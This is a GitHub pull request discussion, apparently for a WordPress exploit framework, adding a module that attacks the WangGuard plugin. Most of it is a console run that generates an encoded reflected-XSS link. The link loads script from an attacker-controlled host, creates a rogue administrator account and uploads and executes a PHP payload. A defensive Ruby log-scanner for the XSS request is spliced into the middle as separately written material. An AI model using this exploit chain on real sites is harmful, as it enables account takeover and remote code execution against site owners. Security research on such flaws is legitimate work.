This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Conversation

@phyushin
Contributor

This module exploits the "Wang Guard" WordPress plugin; the plugin can be downloaded from the following URL:
https://wordpress.org/plugins/wangguard/

Fixed in: 1.7.3

References:

Example output:

wpxf > use exploit/wang_guard_reflected_xss_shell_upload 

  [+] Loaded module: #<Wpxf::Exploit::WangGuardReflectedXssShellUpload:0x000000025da230>

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set host 192.168.0.27

  [+] Set host => 192.168.0.27

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set xss_host 192.168.0.20

  [+] Set xss_host => 192.168.0.20

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x000000029a3470>

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > check

  [!] Target appears to be vulnerable

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.27/wp-admin/admin.php?page=wangguard_users_info&userIP=%3Cscript%3Eeval(String.fromCharCode(101,118,97,108,40,100,101,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,47,118,97,114,37,50,48,97,37,50,48,37,51,68,37,50,48,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,37,50,56,37,50,50,115,99,114,105,112,116,37,50,50,37,50,57,37,51,66,97,46,115,101,116,65,116,116,114,105,98,117,116,101,37,50,56,37,50,50,115,114,99,37,50,50,37,50,67,37,50,48,37,50,50,104,116,116,112,37,51,65,37,50,70,37,50,70,49,57,50,46,49,54,56,46,48,46,50,48,37,51,65,56,48,56,48,37,50,70,77,86,79,77,109,106,88,75,37,50,50,37,50,57,37,51,66,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,37,50,56,97,37,50,57,37,51,66,47,46,115,111,117,114,99,101,41,41))%3C%2Fscript%3E%3C

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, NSmEGs:SUgRuqaMLt
  [-] HTTP server stopped
  [-] Authenticating with WordPress using NSmEGs:SUgRuqaMLt...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.27/wp-content/plugins/nQTYgAukGE/eghhALlKVD.php...
  [+] Result: www-data
  [+] Execution finished successfully

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > 
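The chain above starts with a reflected XSS in the userIP parameter of the wangguard_users_info admin page, so the first observable artefact for a site running a version older than 1.7.3 is an admin.php request whose userIP value is not an IP address. The following is an added detection example, not code from this PR or from wpxf: it parses constructed Apache-style access-log lines (hypothetical, not from the page) and flags such requests.

```ruby
require 'uri'
require 'ipaddr'

# Constructed sample access-log lines (hypothetical). Line 1 is a benign visit
# to the WangGuard page, line 2 carries script markup in userIP, line 3 is unrelated.
SAMPLE_LOG = <<~LOG
  192.168.0.27 - - [20/Jan/2017:10:00:01 +0000] "GET /wp-admin/admin.php?page=wangguard_users_info&userIP=10.0.0.5 HTTP/1.1" 200 5120
  192.168.0.27 - - [20/Jan/2017:10:00:07 +0000] "GET /wp-admin/admin.php?page=wangguard_users_info&userIP=%3Cscript%3Eeval(String.fromCharCode(101,118,97,108))%3C%2Fscript%3E HTTP/1.1" 200 5340
  192.168.0.27 - - [20/Jan/2017:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 9001
LOG

# Request line: method, path (up to '?' or whitespace), optional query string.
REQUEST_RE = /"(?:GET|POST) (?<path>[^?\s]+)(?:\?(?<query>\S*))? HTTP/

# A genuine userIP value is an IPv4/IPv6 literal; anything else is suspect.
def ip_literal?(value)
  IPAddr.new(value)
  true
rescue IPAddr::Error, ArgumentError
  false
end

# Classify one log line: nil (not the WangGuard users page), :benign, or :xss.
def classify(line)
  m = REQUEST_RE.match(line)
  return nil unless m && m[:path].end_with?('/wp-admin/admin.php') && m[:query]
  params = URI.decode_www_form(m[:query]).to_h # percent-decodes each value
  return nil unless params['page'] == 'wangguard_users_info'
  ip_literal?(params.fetch('userIP', '')) ? :benign : :xss
end

# Return [verdict, line] pairs for every WangGuard users-page request in a log.
def scan(log)
  log.each_line.map(&:chomp).filter_map { |l| (v = classify(l)) && [v, l] }
end

scan(SAMPLE_LOG).each { |verdict, line| puts "#{verdict}: #{line}" } if $PROGRAM_NAME == __FILE__
```

A hit is a trigger to check whether a privileged user opened the link and whether new administrator accounts or unexpected PHP files under wp-content/plugins appeared afterwards.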

@phyushin phyushin closed this Jan 20, 2017
@phyushin
Contributor Author

I've closed this PR; will resubmit when I've tested it on Windows too.

@rastating
Owner

@phyushin - there is no official Windows support, but either way, your module won't have environmental issues, so re-open if you wish.

@phyushin phyushin reopened this Jan 20, 2017
@phyushin
Contributor Author

OK, that's done - sorry for the spam.

  end

  def vulnerable_url
    normalize_uri(wordpress_url_admin, 'admin.php?page=wangguard_users_info&userIP=')
  end
Owner


Could you move the query string from this method into the interpolation within url_with_xss instead? There's no functional difference, but would just make it a bit easier to read.

Contributor Author


No worries ... will retest then push.

@rastating rastating merged commit f9292b9 into rastating:development Jan 21, 2017
@rastating
Owner

Tested and merged, thanks 🥇
